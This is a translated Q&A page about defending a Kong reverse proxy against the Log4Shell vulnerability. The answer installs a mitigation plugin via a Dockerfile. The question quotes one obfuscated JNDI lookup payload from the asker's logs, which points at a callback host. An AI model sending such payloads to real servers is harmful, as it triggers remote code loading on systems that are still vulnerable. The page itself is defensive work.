反向代理设备[关闭]

Question

dsteinkopf

Asked: 2021-12-13 21:56:11 +0800 CST2021-12-13 21:56:11 +0800 CST 2021-12-13 21:56:11 +0800 CST

使用kong反向代理过滤log4j漏洞

772

我正在使用kong 反向代理来代理我的 Web 服务器的每个 HTTP 请求。我想通过查找和替换关键攻击者的字符串（如“jndi”）来缓解当前的 log4j 问题（“ log4shell ”）。例如，我发现这是我的日志：

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

我认为这可以通过使用请求转换器插件来完成。有人已经这样做了吗？

PS只是替换jndi为disabled太深远了，破坏了很多东西。

1 个回答

Voted

dsteinkopf · Answer 1 · 2021-12-17T14:11:26+08:00

Best Answer

dsteinkopf

2021-12-17T14:11:26+08:002021-12-17T14:11:26+08:00

来自 kong 的人最近发了一篇博文来回答我的问题。他们开发了一个kong 插件来缓解漏洞。

我通过更改我的 Dockerfile 将此插件添加到我的 kong 中：

FROM kong:2.6
...
USER root
...
# log4shell mitigation
# see https://konghq.com/blog/log4j-log4shell/
RUN git clone https://github.com/brentos/kong-plugin-log4shell && \
    cd kong-plugin-log4shell && \
    luarocks make
...
ENV KONG_PLUGINS ...,log4shell
...
USER kong

然后我只是将此 log4shell 添加为全局插件。

2

使用kong反向代理过滤log4j漏洞

新安装后 postgres 的默认超级用户用户名/密码是什么？

SFTP 使用什么端口？

命令行列出 Windows Active Directory 组中的用户？

什么是 Pem 文件，它与其他 OpenSSL 生成的密钥文件格式有何不同？

如何确定bash变量是否为空？

使用kong反向代理过滤log4j漏洞

1 个回答

相关问题